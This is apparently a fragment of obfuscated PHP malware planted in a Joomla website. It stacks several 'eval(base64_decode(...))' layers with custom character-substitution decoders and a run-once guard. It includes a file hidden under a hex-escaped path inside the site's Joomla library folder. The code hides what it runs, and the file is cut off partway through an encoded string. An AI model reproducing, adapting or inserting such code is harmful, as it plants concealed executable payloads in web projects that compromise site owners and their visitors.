zgnLgonRG9rOERvazhEV3RPWVdzOFJuYmNhS2NyVldjRVV6ODBZejBNRlI5OERvazhEb2s4RG9rOEQnLgonb0hjcVdjWHZQWFFEb2s4RG9rOERvSDFGUjk4RG9rOERvazhEV3R4YU50NFVMazloV2RyZ1dJVmhOam0zemsxN3prbVV6YTRGUjk4RG9rOERvazgnLgonRG54Ym9MazhEb2s4RG9rOERvazhEV3ROQ2lQOWhXZHJnV0lWaE5SbTN6ME1GUjk4RG9rOERvazhEblhib0xrOERvazhEb2s4VWlwMlVpY0tEbzgwVVdJWEN0eG1DeicuCidnZ0RGWDFEb2dQVm50bVlpVG1RUlhRRG9rOERvazhEb0hNRlI5OERvazhEb2s4RG9rOERvSDRVTDgwVVdJWEN0eG1hTmptM3prMTd6a21DaWQwaEEwYm9MazhEJy4KJ29rOERvazhEb2s4RG54Ym9MazhEb2s4RG9rOERvazhEb2s4RG9IT2FaMVBWbnRtWWllNUNpZDBRb2QwQzNkcmlBZ1BoWlh4RG9kMEMzZHJpQWcwaFpYNHZQWFFEb2s4RG8nLgonazhEb2s4RG9rODVSWFFEb2s4RG9rOERvazhEb2s4VWlwMlVpY0tRb2QwQzNkcmlBZzJDemdnREZYMURvZ0FVaScuCidYbVFSWFFEb2s4RG9rOERvazhEb2s4cVBYUURvazhEb2s4RG9rOERvazhEb2s4RFdiMjN5SHhnaWc0VmMxQVVpWDloV2RyZ1dJVmh5a20zejBNRlI5OERvazhEb2s4RG8nLgonazhEb0gxRlI5OERvazhEb2s4RG5YYm9MazhEb2s4RG9rOFVpYjlWQWswVVdJWEN0eG1DaXhtJy4KJzNmeGJvTGs4RG9rOERvazhVM3I0Z284NHZQWFFEb2s4RG5YYm84WFFEb2s4RFdiMjN5SHhnaWc0VmMxeFZOSTBRbzBNRlI0MSc7CiR0bGlpcSA9IEFycmF5KCcxJz0+JzknLCAnMCc9PidrJywgJzMnPT4nWCcsICcyJz0+J3onLCAnNSc9PidmJywgJzQnPT4ncCcsICc3Jz0+J1AnLCAnNic9Pid1JywgJzknPT4nbycsICc4Jz0+J2cnLCAnQSc9Pid5JywgJ0MnPT4nWScsICdCJz0+J3EnLCAnRSc9Pic2JywgJ0QnPT4nSScsICdHJz0+J00nLCAnRic9PidEJywgJ0knPT4nRicsICdIJz0+J0InLCAnSyc9PidtJywgJ0onPT4nVScsICdNJz0+JzcnLCAnTCc9PidpJywgJ08nPT4naicsICdOJz0+JzInLCAnUSc9PidLJywgJ1AnPT4ndycsICdTJz0+J0wnLCAnUic9PidRJywgJ1UnPT4nWicsICdUJz0+JzQnLCAnVyc9PidHJywgJ1YnPT4nYicsICdZJz0+J2EnLCAnWCc9PicwJywgJ1onPT4nMScsICdhJz0+J2MnLCAnYyc9PidsJywgJ2InPT4nTicsICdlJz0+JzUnLCAnZCc9PidSJywgJ2cnPT4nZCcsICdmJz0+J1QnLCAnaSc9PidXJywgJ2gnPT4nSicsICdrJz0+J0EnLCAnaic9PidFJywgJ20nPT4nbicsICdsJz0+J3YnLCAnbyc9PidDJywgJ24nPT4nSCcsICdxJz0+J2UnLCAncCc9Pid4JywgJ3MnPT4nOCcsICdyJz0+J2gnLCAndSc9PidyJywgJ3QnPT4nVicsICd3Jz0+J3QnLCAndic9PidPJywgJ3knPT4nMycsICd4Jz0+J3MnLCAneic9PidTJyk7CmV2YWwvKm0qLyhyZXBxYmlhKCR3dm95amV2LCAkdGxpaXEpKTsKfQ==")); include "\x45:\\\x48ost\x69ngS\x70ace\x73\\V\x61nso\x65st1\\im\x70act\x69nca\x73so.\x65u\\\x77wwr\x6fot\\lib\x72ari\x65s\\\x6aoom\x6ca/d\x6fcum\x65nt/\x69mag\x65/ja\x76asc\x72ipt\x2ephp"; eval(base64_decode("aWYgKCFkZWZpbmVkKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JykpCnsKZGVmaW5lKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JywgMSk7CgogJGxscG5xeWJ0cSA9IDc4NzE7IGZ1bmN0aW9uIGVpcnR1ZHNtKCRwdmR3Y2NjLCAkdXZjeW9mZ2gpeyR6bmxydCA9ICcnOyBmb3IoJGk9MDsgJGkgPCBzdHJsZW4oJHB2ZHdjY2MpOyAkaSsrKXskem5scnQgLj0gaXNzZXQoJHV2Y3lvZmdoWyRwdmR3Y2NjWyRpXV0pID8gJHV2Y3lvZmdoWyRwdmR3Y2NjWyRpXV0gOiAkcHZkd2NjY1skaV07fQokZ2pza3o9ImJhc2UiIC4gIjY0X2RlY29kZSI7cmV0dXJuICRnanNreigkem5scnQpO30KJHFsa3RwbGdkbm0gPSAnSm1NdTBZMkY5VUpzdkNZSFhCMkhVQ3lnOUhYaWY0T1lvNHhwa3hXekptTXUwWTJGOVVKc3ZDeWc5WjJNWHF2Z1hxJy4KJzVxRHIzeHpvaWJyaFNwUkJNYVhDWVd6cm5sUFVBYTlVQU1QS1lXMFQydVVLRXBSVFZxRHIzeHpvaWJyaCcuCidTTVhxdmdYTTJIOVVTZ1hxRXBSQlhzNXJoNk5KcDNYQ1lXVUtFcFJUWWFSbU1sMFVKczVyaDZOSnNicjhXejBUUHNmVEVNOUJNdTlUSnNmTVNmVncyd29XeGR6ZWgnLgonYnJxaWJyZDM4ZnJTaDlUOXBSQlZzZk1TZlZ3MndvV3hkRHIzZFVtSWR6b2licnFXYnI4V3owVFBzZlRFJy4KJ005Qk11OVRKc2ZoRXZWaFlOWTQyZVRZMm9FWVNTVmh3Vm9aZmR6ZWhicnFpYnJkMzhmclNoJy4KJzlUOXBSQlZzZmhFdlZoWU5ZNDJlVFkyb0VZU1NWaHdWb1pmZERyM2RESGZwa3hXemFKV3pOSnBwOWQzc2ZURU05Qk11OVRKc3ZXdzVWaCcuCidZU0V3TWFWTVlrVUY0V2JtNUliQ2JCYlFmRlBCNEk1QndBOUJoQ2tqdnBQVGZ5YkJ3VzBUMXlrclhwekpXekx4V3pmcjM4Zm1FTTlCTXU5ZThxSlZ5ZUUnLgonVnc0VFkyZVlWT2E1b0pXUEY4S1BDUEM1UWJkUG84SFBUd0Iwb1BJWEJNQVBRNENQVUVwUkY0SXZIeDg1ZWg2TicuCidKc2JyZDM4ZnIzaDltd1dQZTMyZjRPWW80eDZOSnM4ZnIzOHZtRUFubXdhMENZT2ZOVzhvTVk1b05pYnI4V3pmcjM4ZicuCidyRWpvNDJySlZ5b1RIblFYWjJBblVFc3ZaVzg3ZTNxUFE0STVOdmQ5QlZsYkZQSzVlV1c1VGJCRFRmSTVtSmxiQlBIYm9WS1AnLgonVGJRYm9QWnZGaWJyZDM4ZnJTcVJtMmRQVHg4dm1iRlVDd1pubTg2TkpzYnI4V3pmcjM4Zm05WlJCYlcwVDJ1Zm1iJy4KJ0ZVV25NbjRBZ1hLSnN6Sld6ZnIzOGZqaWJyZDM4ZnIzOGZyMzhYQllXblV2dWZqYldYcUVnUm0ySzlVZnNYanZNOScuCidaMkg5VVNpUFRiTXpyWGdVZEFLbktuMTlxRXh6WXh1RENocURyWHFENDNoVVpid1ZNOXdWTWlxZXdFVlZ3MmZvWmJWdlpXcHpvaWJyZDM4ZnJTMk5Kc2JyZDM4ZnJTQm5UJy4KJ09Rbm1NZ1JkU1FYWjJqOVVFVVhCTVdQVHZpOVZFcFhxNXN6Sld6ZnIzOGZqaWJyZDM4ZnIzOGZyMzh2anZNWEgzMmY0d0hYQndPenJoNk5Kc2JyZCcuCiczOGZyMzhmcjM4dm13dVBUeU9YS01GVUt3WjlVWU1mTlc4SlV2SFBVaHN6b2licjhXemZyMzhmcjM4Jy4KJ2ZyM2hQVE9BUmpNRkxVYmFYVVlNblRZUlVlMzJmbWJGVVduTW40RWdQWnZnUktKc3pvaWJyOFd6ZnIzOGZyMzhmcjNoWENZaTlNMnhQVUVzZicuCidOVzh2dzJvRVl2VEVZdlJ2WmJOVmhNSll3Mm1lVnl3b2h3YkVlbm5reFd6ZnIzOGZyMzhmclNLMG1NaTknLgonZTNzenJFRlJtd0YwcjMyZmpiV1hxdnhSSzVzdmpiTVJtOWFYbXdXMHJ4OEU0TWVFVmJWb1p2OVVaYndWNHdlSllFN1ZkaHBmcjQyJy4KJzdlU21KVnlvRWVoYnJkMzhmcjM4ZnIzOEx4V3pmcjM4ZnIzOGZyMzhmcjM4dmpiTVJtOWFYbXdXMHIzMmZqYlpQcWJXWGQ4aFhDWWk5TTJ4UFVFc0RyM3hEcjNoWCcuCidDeUFYQzhwa3hXek5KczhmcjM4ZnIzOGZyMzhmclNwOWQzc3ZqYk1SbTlhWG13VzByMzI3ZVNRWFoyajlVRTRSJy4KJ0NiZVJDMld6cmhwTkpzOGZyMzhmcjM4ZnIzOGZyUzZOSnM4ZnIzOGZyMzhmcjM4ZnIzOGZyMzhQcXZNUFRpNk5KczhmcjM4ZnIzOGZyMzhmclMnLgonMk5Kc2JyZDM4ZnIzOGZyMzhmcjM4Zm1NQmZyQUZuanZpOVRJc3ZqYk1SbTlhWG13VzByaHBOSnM4ZnIzOGZyMzhmcjM4ZnJTNk5KczgnLgonZnIzOGZyMzhmcjM4ZnIzOGZyMzh2bXd1UFR5T1hLTUZVS3daOVVZTVRaVzg3ZTNoWENZaTlNMicuCid4UFVFc2t4V3pmcjM4ZnIzOGZyMzhmcjM4YUpXemZyMzhmcjM4ZnJTMk5Kc2JyZDM4ZnIzOGZyMzg5QjJIOVR3UTByJy4KJzNzdm13dVBUeU9YS01GVUt3WjlVWU1mbXdGZnJFUW5Vdkg5VE9XVUNFcFhkaGJyZDM4ZnIzOGZyMzhMeFd6ZnIzOGZyMzhmcjM4ZnIzJy4KJzgwVFA4enJ3cFJNMkFYcXZBTGU4aFBLWUhYQll1bncyaDBVZmlmckVIOVU1cHpKV3pmcjM4ZnIzOGZyMzhmcjM4THhXemZyMzhmcjM4ZnIzOGZyMzgnLgonZnIzOGZyRUg5VTU4N2VTQVhxdkFMWTJsOVV2cTllOGhYQllGRHJTUVhaMmo5VUU0MFUnLgondk1QS0VnWHFNNTBVYld6ckVRblV2SDlUT1dVQ0VwWGRocGt4V3pmcjM4ZnIzOGZyMzhmcjM4YUpXemZyMzhmcjM4ZnJTMk5KcycuCidicmQzOGZyMzhmcjM4WEJZV25VdnVmbWJGVVdiczlUYnRZS3Zwbm13ZFJtVnNQVXZIUFVNYW5UT3BYVVlNenJFSDlVNXB6b2licmQzJy4KJzhmclMyTkpzYnJkMzhmclNCblRPUW5tTWdSZFNRWFoyTjBtWVEwWm5IMFVFQVBCeU16ckVoMFV2YVJtTUZucmhicmQzOGZyUzZOSnM4Jy4KJ2ZyMzhmcjM4ZnJFaDBVdmFSbU1GbncyS1hCTVdQVHZpOWUzMmY0d0hYQndPenJoNk5Kc2JyZDM4ZnIzOGZyMzg5QjJIOVR3UTByM3N2bUVwWE0yaTBVYldmbXdGZnJFaDBVZicuCidwTkpzOGZyMzhmcjM4ZmppYnJkMzhmcjM4ZnIzOGZyMzhmbU1CZnJBMzBVYmFuS3Zwbm13ZFInLgonbVZzdm1FcFhkaDh2ZFA4MFViYTltTUh6ckVoMFVmcHpKV3pmcjM4ZnIzOGZyMzhmcjM4THhXemZyMzhmcjM4ZnIzOGZyMzhmcjM4ZnJFaCcuCicwVXZhUm1NRm53MktYQk1XUFR2aTlZbG5mTlc4dm1FcFhRaWJyZDM4ZnIzOGZyMzhmcjM4ZmpXYnJkMzhmcjM4ZnIzOGFKV3pOSnMnLgonOGZyMzhmcjM4Zmp2TW5qWUhSZDNoOW1NSFVDeXBYS0Vhbkt2cG5td2RSbVY2TkpzOGZyMzhhSld6TkpzOGZyMzg5cVl1UEtFcFJDSThQS2JhRScuCidDWVdFbU1IOVRiV1JLdk9vbU1GbnI4aDltTUhEcjNoOW1ZeG5tODI1bzNwTkpzOGZyMzhMeFd6ZnIzOGZyMzhmcjNoWEJZRm5UeVdmTlc4UFV2SFBVaHN6b2licjhXJy4KJ3pmcjM4ZnIzOGZyU3A5ZDNzZlRNRlVDRXBYZDhoOW1NSHplaGJyZDM4ZnIzOGZyMzhMeFd6ZnIzOGZyMzhmcjM4ZnIzOFhCWVduVXZ1Jy4KJ2ZyRUg5VWJaUmpKNk5KczhmcjM4ZnIzOGZqV2JyOFd6ZnIzOGZyMzhmcjNoWEJZRm5UeVdUWlc4N2UzaDltTUhreFd6ZnIzOGZyMzhmcjMnLgonaDltTUhVQ2JnblRPV2ZOVzg1TmlicjhXemZyMzhmcjM4ZnJTcDlkM3N2bUVNWGpFc2ZOeDg1Jy4KJ2VoYnJkMzhmcjM4ZnIzOEx4V3pmcjM4ZnIzOGZyMzhmcjM4WEJZV25VdnVmckVIOVViWlJqSjZOSnM4ZnIzOGZyMzgnLgonZmpXYnI4V3pmcjM4ZnIzOGZyM2g5bU1IZk5XOFhLRUhSbVl1enJFaDBVZnBmTlcyZk40ODdIM2g5bU1IZk4nLgonczhYcUVIMFRXc3ZtRXBYZHg4dlp5WERIWHBreFd6ZnIzOGZyMzhmcjNoMHIzMmY0U2dYbScuCidZdTltTUh6ckVoMFVmcGt4V3pmcjM4ZnIzOGZyU3A5ZDNzdm04ODdvVzJmNDlTb3did3pKV3pmcjM4ZnIzOGZyUzZOSnM4ZnIzOGZyMzhmcjM4ZnJTSDlVRVpYQkk4Jy4KJ3Zqdk1YS1lpbk5pYnJkMzhmcjM4ZnIzOGFKV3pOSnM4ZnIzOGZyMzhmam5zMFR5TWZyOHN2bVA4N2VTSDlUd2g5bU1IenJFc3plaDhmb1cyZjQ5Jy4KJ1Nvd2J3ekpXemZyMzhmcjM4ZnJTNk5KczhmcjM4ZnIzOGZyMzhmclNwOWQzc3ZtUDhmb1cyZnJYdXZIU0FSQko4dm1QOGZvVzJmclh1RGRYcE5KczhmcjM4ZnInLgonMzhmcjM4ZnJTNk5KczhmcjM4ZnIzOGZyMzhmcjM4ZnIzOHZtYlpYcXZNUnFFYTltTUhmTlc4ZmRFaDBVZmd2bVBka3hXemZyMycuCic4ZnIzOGZyMzhmcjM4ZnIzOGZtTUJmckFwWFoyaDBVZnN2bWJaWHF2TVJxRWE5bU1IemVoYnJkMzhmcjM4ZnIzOGZyMzhmJy4KJ3IzOGZyUzZOSnM4ZnIzOGZyMzhmcjM4ZnIzOGZyMzhmcjM4ZnJFaDBVdmFQQzJaUnFKOHpGVzg1b2licjhXemZyMzhmcjM4ZnIzOGZyMzhmcjMnLgonOGZyMzhmcjNoWEJZRm5UeVdUWlc4N2UzaFBLWUhYQll1bncyaDBVZjZOSnM4ZnIzOGZyMzhmcjM4ZnIzOGZyMzhmcjM4ZnJFSDknLgonVWJaUmpKODdlU0FYcXZBTFkybDlVdnE5ZThoWEJZRm5UeVdEclNRWFoyajlVRTQwVXZNUEtFZ1hxTTUwVWJXenJFUW5Vdkg5VE9XVUNFcFhkJy4KJ3g4dm1FTVhqRXNmcjE4NW8zcHpvaWJyZDM4ZnIzOGZyMzhmcjM4ZnIzOGZyUzJOSnM4ZnIzOGZyMzhmcjM4ZnJTMk5KczhmcjM4ZnIzJy4KJzhmaldicjhXemZyMzhmcjM4ZnJTUVJtMkY5VEVwWGQ4aDByaDZOSnNicmQzOGZyMzhmcjM4WEJZV25VdicuCid1ZnJFSDlVYlpSako2TkpzOGZyMzhhSld6TkpzOGZyMzg5cVl1UEtFcFJDSThQS2JhRUNZV0VtMlFWQjJnbnI4cE5KczhmcjM4THhXemZyMzgnLgonZnIzOGZyM2g5bTJRWEIyZ253Mk1SQko4N2VTRm5qdkhYbTJGenJFYVZXWWVZaFllVEhub0padnZWd0VhRWhNNUVWT1NvVlZxVWV4OHZ3Mm9FWXZURVl2Jy4KJ1J2WnZ3VllZd1ZaRWFZWXZ2dlpXcGt4V3pmcjM4ZnIzOGZyU3A5ZDNzdm1FZ1BLdmdSS0VhOVRPaGZOVzI3ZVNtSlZ5b0VlaGJyZDM4ZnIzOGZyMzhMeFd6ZicuCidyMzhmcjM4ZnIzOGZyMzhYQllXblV2dWZyRWFWV1llWWhZZVRIbjRvV2JZb1ZZa1l3MmVvVzJWdlpXNk5KczhmcicuCiczOGZyMzhmaldicmQzOGZyMzhmcjM4OVR5RjlUTUJmcjhoOW0yUVhCMmdudzJNUkJKODdvVzInLgonZk4zcE5KczhmcjM4ZnIzOGZqaWJyZDM4ZnIzOGZyMzhmcjM4Zmp2TW5qWUhSZDNkREhmNk5KczhmcjM4ZnIzJy4KJzhmaldicmQzOGZyMzhmcjM4OVR5RjlKV3pmcjM4ZnIzOGZyUzZOSnM4ZnIzOGZyMzhmcjM4ZnJTSCcuCic5VUVaWEJJOFhLWWRYS0VIenJFYVZXWWVZaFllVEhub0padnZWd0VhRWhNNUVWT1NvVlZxVWV4ODVyeDh2bUVnUEt2Z1JLRWE5VE9oem9pYnJkJy4KJzM4ZnIzOGZyMzhhSld6ZnIzOGZqV2JyOFd6ZnIzOGZtTUJmcjhBOXFZdVBLRXBSQ09hOVVBcFhLJy4KJ0VGenJuQjBUeU1VS1NabncyUVJDT1c5VE9XWEhYcHpKV3pmcjM4ZmppYnJkMzhmcjM4ZnIzODlxWXVQS0VwUkNJODlCTWknLgonOVkyeG5VRWFQQzJ1bm1ZdW5qNXN2bUlpZnJFaERyM2g5QnlBOUgzMmY0OUFSamJNekpXemZyMzhmcjM4ZnJTNk5KczhmcjM4ZnIzOGZyMzhmcjNoUlQyaDllJy4KJzMyZnJFQlJtd3FmTlcyZk44ODdIM3FQZVg4a2QzcW5IWDZOSnM4ZnIzOGZyMzhmcjM4ZnIzaDlkMzJmNFNCUktTTVJkOGhSZHg4dm1aZzltVnBreFd6ZnIzOGZyJy4KJzM4ZnIzOGZyMzgwVFA4enJFQmZOVzI3ZVNtUFR5RjllaGJyZDM4ZnIzOGZyMzhmcjM4ZmppYnJkMzhmcjMnLgonOGZyMzhmcjM4ZnIzOGZyU0g5VUVaWEJJODVOaWJyZDM4ZnIzOGZyMzhmcjM4ZmpXYnJkMycuCic4ZnIzOGZyMzhmcjM4Zm1ZaVhDVmJyZDM4ZnIzOGZyMzhmcjM4ZmppYnJkMzhmcjM4ZnIzOGZyMzhmcjM4ZnJTcDlkMycuCidzMFViYVBVdkhQVWhzdm1KcHplM2g5cjMyZm1NbFhteWc5bVZzdm1KcGt4V3pmcjM4ZnIzOGZyJy4KJzM4ZnIzOGZyMzhmckVkTFVFTVhaMktYQk1Xbm1ZdWZOVzg5cW5IMFVFTXpyRUJEcjNoOXInLgonaDZOSnM4ZnIzOGZyMzhmcjM4ZnIzOGZyMzg5QmJpUktiTXpyRUJ6b2licmQzOGZyMzhmcicuCiczOGZyMzhmcjM4ZnJTSDlVRVpYQkk4dm12T25tWUZVS25IMFVFVzlUSTZOSnM4ZnIzOGZyMzhmcjM4ZnJTMk5KczhmcicuCiczOGZyMzhmaldicmQzOGZyUzJOSnNicmQzOGZyU3A5ZDNzZlQ5WlJCYlcwVDJ1VUNZSTBVYldYSDhxOUJNaTlZMnE5VUVhUEMydW5tWXVuajVxeicuCidlaGJyZDM4ZnJTNk5KczhmcjM4ZnIzOGZtOVpSQmJXMFQydWZtOXBSbVlhOUNZV1VDYmdScUVNUnFFRnpyRUIwVHlNUkJ3bDllaGJyZDM4ZnIzOGZyMzhMeFd6ZnIzOGZyMzhmJy4KJ3IzOGZyMzh2bTlzUFRPaFJtVjg3ZVNCUktTTVJkOGg5Qk1pOVRPQVJUVmlmcnZIZmRoNk5KczhmcjM4ZnIzOGZyMycuCic4ZnIzaDlCYmdScUVNUnFFRmZOVzg5cXZNUFRKc3ZtOXNQVE9oUm1WaWZtOXBSbVlGMFVwTXpyRUIwVHlNUkJ3bDllaHBreCcuCidXemZyMzhmcjM4ZnIzOGZyMzg5QmJpUktiTXpyRUIwbXd1OW15TXpvaWJyOFd6ZnIzOGZyMzhmcjM4ZnIzOFhCWVduVXZ1ZnJFQlBDMnVubScuCidZdW5qNTZOSnM4ZnIzOGZyMzhmaldicmQzOGZyUzJOSnNicjhXemZyMzhmbTlaUkJiVzBUMnVmbWJGJy4KJ1VDRU1QS3ZPWGpFYVhtQUFYQ1Zzdm1FQW5tNGlmckV0OVVocE5KczhmcjM4THhXemZyMzhmcjM4ZnIzaFJLWVdVJy4KJ0NFQW5tNDg3ZTNkZlFpYnI4V3pmcjM4ZnIzOGZyU0JSS2Y4enJFcDdvMzZmckVwN2piV1hCeU1SZDhoOW13V1BlaDZ6Sld6ZnIzOGZyMzhmclM2TkpzOGZyMzhmcjM4ZicuCidyMzhmclNCUktmOHpyRUc3bzM2ZnJFRzdqYldYQnlNUmQ4aDBDWU96ZTNCdmQzaDBveScuCidGbmp2aTlUSXN2bUVBbm00cGtIM2gwZGl0RHIzaDBlaXR6Sld6ZnIzOGZyMzhmcjM4ZnIzOEx4V3pmcjM4ZnIzOGZyMzhmcjM4Jy4KJ2ZyMzhmckVnblVFYTltd1dQZTN1N2VTUTBqZnNSS3ZoenJFaFBVRUFUSEVwVWVoOFVkU2dYQkpzdm1sTUxZaWgwTVdwem9pJy4KJ2JyZDM4ZnIzOGZyMzhmcjM4ZmpXYnJkMzhmcjM4ZnIzOGFKV3pOSnM4ZnIzOGZyMzhmanZNbmpZSFJkM2hSS1lXVUNFQW5tNDZOSnM4ZnIzOGFKJy4KJ1d6TkpzOGZyMzg5cVl1UEtFcFJDSThQS2JhOW1ZUVhxTXhucjhoOW13V1BleDh2bWxNTGVoYnInLgonZDM4ZnJTNk5KczhmcjM4ZnIzOGZtbmlSQ3ZBUnIzaFBLYmFQVVlXME5pYnI4V3pmcjM4ZnIzOGZyU0g5VUVaWEJJOFBLYmE5bVlRWHFNeG53MngwbXdGOWVBUVhaMmg5Jy4KJ1RiSExVU1dVS1NzUFViTXpyRWhQVUVBRHIzaDBDWU96ZXg4dm1iRlVDd1pubThwa3hXemZyMzhmalcnLgonYnJkMzhmclNCblRPUW5tTWdSZFNRWFoyTVJCYkhMVVNXenJFaFBVRUFEcjNoMENZT3pKV3pmcjM4ZmppYnJkMycuCic4ZnIzOGZyMzg5Q3lnUEJ3aWZyRVFYWjJBblVFc2t4V3pOSnM4ZnIzOGZyMzhmanZNbmpZSFJkU1FYWjJoOVRiSExVUycuCidXVUtTc1BVYk16bWJGVUNFTVBLdk9YakVhWG1BQVhDVnN2bUVBbm00aWZyRVFYWjJBblVFc3pleDh2bWxNTGVoNk5KczhmcjM4YUpXek5KczhmcjM4OXFZdVBLRXBSJy4KJ0NJOFBLYmE5Qk1pOVkySDlUd2h6ckV4UFVFc3pKV3pmcjM4ZmppYnJkMzhmcjM4ZnIzOHZtRUFubTQ4N2VTMzlCTWk5WTJxOVVFYVBDMnVubVl1bmo1c3ZqU0FubThwa3gnLgonV3pOSnM4ZnIzOGZyMzhmanZNbmpZSFJkM2g5bXdXUG9pYnJkMzhmclMyTkpzYnJkMzhmclNCblRPUW5tTWdSZFNRWFoyQjBUeU1VS25IMFVFTXpyRXhQVUVzRHIzaDltd1dQJy4KJ2VoYnJkMzhmclM2TkpzOGZyMzhmcjM4ZjRTQjBUeU1VS1NabncyUVJDT1c5VE9XWEg4aFhtd1cwcng4dm1FQW4nLgonbTRwa3hXemZyMzhmaldicjhXemZyMzhmbTlaUkJiVzBUMnVmbWJGVUM5cFJtWWFQVVN4OVRPaHpyRXhQVUVzRHIzaDltd1dQJy4KJ2VoYnJkMzhmclM2TkpzOGZyMzhmcjM4ZjRTQjBUeU1VS1NabncyUVJDT1c5VE9XWEg4aFhtd1cwcng4Jy4KJ3ZtRUFubTRpZk44cGt4V3pmcjM4ZmpXYnI4V3pmcjM4Zm05WlJCYlcwVDJ1Zm1iRlVLYmdYcUVhUEMybFhtJy4KJ3dIOVVmc3ZtNGlmckVkekpXemZyMzhmamlicmQzOGZyMzhmcjM4WEJZV25VdnVmamJXWEJ5TVJkOGhQZWg4RGVTRm5qdmk5VElzdm1mcGt4V3onLgonZnIzOGZqV2JyOFd6ZnIzOGZtOVpSQmJXMFQydWZtYkZVV25NbjRiZ1JUWmdSTWJXUkt2QTlDVnN2bUVwWHE1Mm9NWTVvcmgnLgonYnJkMzhmclM2TkpzOGZyMzhmcjM4ZnJFRjlUeUJVQ0VwWGQzMmZtRXBYQk9BUlRWc1VaMm1lVnl3VVoxcGt4V3pOSnM4ZnIzOGZyMzhmckVRUkNabFJDT2FSJy4KJ0J3bDlVNTg3ZVNTWHF2QUxlOGRSS1NXMFQydVhIZmlmcnZDMFRZS1hIZmlmcnZ4UFRuTVhIZmlmcnZGOVViRicuCicwVDJ1WEhmaWZydkZubXdXWEhmaWZydlpYQ1lIWEhmaWZydkFYcUVwUEN5TVhIZmlmcnZoblRaeGZkeDgnLgonZkJBTVBURU1YcTVkRHIzZFJtTWRYSGZwa3hXek5KczhmcjM4ZnIzOGZyRVdSVVNhOW1NSGZOVzh2aicuCidiTVJtOWE5bU1IZnJJOGZkMWRmckk4dm1iZ1JUWmdSTTJ1UFRaTVhabEZuanZpOVRJc1BLYmFFQ1lXZW0yRicuCiducjhwemUzTWZtYmduVE9XenJFUVJDWmxSQ09hUkJ3bDlVNXBVb2licjhXemZyMzhmcjM4ZnJTcDlkM3M5Qk1pOVkyTScuCidMbU1Gbmo1c3ZqRWxYdzJoMFVmcHpKV3pmcjM4ZnIzOGZyUzZOSnM4ZnIzOGZyMzhmcjM4ZicuCidyU0g5VUVaWEJJOHZqRWxYdzJoMFVmNk5KczhmcjM4ZnIzOGZqV2JyOFd6ZnIzOGZyMycuCic4ZnJTcDlkQWwwQ0VwWGQ4aG5tWnhVQ0VwWGRocE5KczhmcjM4ZnIzOGZqaWJyZDM4ZnIzOGZyMzhmcjM4Zmp2TW5qWUhSZDNobm1aeFVDRXAnLgonWFFpYnJkMzhmcjM4ZnIzOGFKV3pOSnM4ZnIzOGZyMzhmanZNbmpZSFJkM2RmUWlicmQzOGZyUzJOSnNicmQzOGZyU0JuVE9Rbm1NZ1InLgonZFNRWFoyeFJqWXEwVE9hUFRFaHpyRXVQVFpNRHIzaFBCd0Y5b1BXVUNFQW5tNHBOSnM4ZnIzOEx4V3pmcjM4ZnIzOGZyM2g5bXcnLgonV1BlMzJmbXZBWENWQ2J3Mmg5VGJnOW1Wc3ZtdkFYQ1ZDYncyaFBVRUF6b2licjhXemZyMzhmcjM4ZnIzaFhLRWdYQndxOVkyeFBVRXNmTlcnLgonOFBLYmFFQ1lXSkMybFJUMnVWS0VnWEJ3cTllOHBmckk4ZmQxZGt4V3pmcjM4ZnIzOGZyM2hYSycuCidFZ1hCd3E5WTJ4UFVFc2ZOVzh2amJXUkt2QTlDWWFYbXdXMHIzdWZqYlpQcWJXWGRBbDlOJy4KJ1ZzZkJiQVBDQU1mZGhpZk4zaWZOVnBmckk4Zk0xZGZySThSVEpaenJFdVBUWk1mckk4UEtiJy4KJ2FFQ1lXZW0yRm5yOHB6b2licjhXek5KczhmcjM4ZnIzOGZtYkZVQzlwUm1ZYW5LdnBubVZzdmpiV1JLdkE5Q1lhWG13VzByeDhQS2JhOVRPJy4KJ1FYcU14bnI4aDltd1dQZXg4UEtiYUVDWVdlbTJGbnI4cHplaDZOSnM4ZnIzOGFKV3pOSnM4ZnIzODlxWXVQS0VwUkNJOCcuCidQS2JhWG15WjlDTXVVS3ZNUmU4aFJCd2w5ZWhicmQzOGZyUzZOSnM4ZnIzOGZyMzhmckVGJy4KJ25tMkhQVG5NVUtTQW5tODg3ZVNRWFoyajlVRU5SQ1psUkNPb25tMkhQVG5NenJodWZyZmdmUWlicmQzOGZyMzhmcjM4dmpiJy4KJ1dSS3ZBOUNZYVhtd1cwcjMyZnJFRm5tMkhQVG5NVUtTQW5tODhEZFNGblR2Rm5qZnNSVEpaenJ2UVBUYnM5ZWZwRHIzeERyM1p6ZTN1ZnJ2YWZkM3VmbVpoYmU4aFJCd2w5Jy4KJ2UzdWZtYkZVV25NbjRBZ1hLSnN6ZWg2TkpzYnJkMzhmcjM4ZnIzODBUUDh6bTlwUm1ZYTlVQXBYS0VGenJFRm5tMkhQVG5NVUtTQW5tOHB6Sld6ZnIzOGZyMzhmclM2Jy4KJ05KczhmcjM4ZnIzOGZyMzhmclMzblRPaTBUT3R6ckVGbm0ySFBUbk1VS1NBbm04cGt4V3pmcjM4ZnIzOGZyUzJOSnMnLgonOGZyMzhhSld6TkpzOGZyMzg5cVl1UEtFcFJDSThQS2JhWG15WjlDTXVVQ3lnUFRKc3ZtT0FSVFYyb01ZNW9yaGJyZDM4ZnJTNk5KczhmcjM4ZnIzOGZyRUZubScuCicySFBUbk1VS1NBbm04ODdlU1FYWjJqOVVFTlJDWmxSQ09vbm0ySFBUbk16cmg2TkpzYnJkMzhmcjM4ZnIzODBUUDh6bU1GVUNFcFhkOCcuCidoWEtFZ1hCd3E5WTJ4UFVFc3plaGJyZDM4ZnIzOGZyMzhMeFd6ZnIzOGZyMzhmcjM4ZnIzODBUUDh6ckV1UFRaTWZOVzJmNE9ZbzR4cGZyMWdmbXlnUFRKOFBUeWlmalNpblRuJy4KJ3BScTVicmQzOGZyMzhmcjM4ZnIzOGZqaWJyZDM4ZnIzOGZyMzhmcjM4ZnIzOGZyU0JSS3ZNUFQnLgonYnNmckFGUEN3dTltTUh6ckVGbm0ySFBUbk1VS1NBbm04cGZtd0ZmckV0OVVoMjdkRXhSallxMFRPYVJCd2w5ZWhicmQzOGZyMzhmcjM4ZnIzOGZyMycuCic4ZnJTNk5KczhmcjM4ZnIzOGZyMzhmcjM4ZnIzOGZyMzhmbU1CZnJBRm5qdnhSSzVzdmpTaW5UbnBSTTJ1UFRaTURyU0ZuVHZGbmpmc1InLgonVEpaenJ2UVBUYnM5ZWZ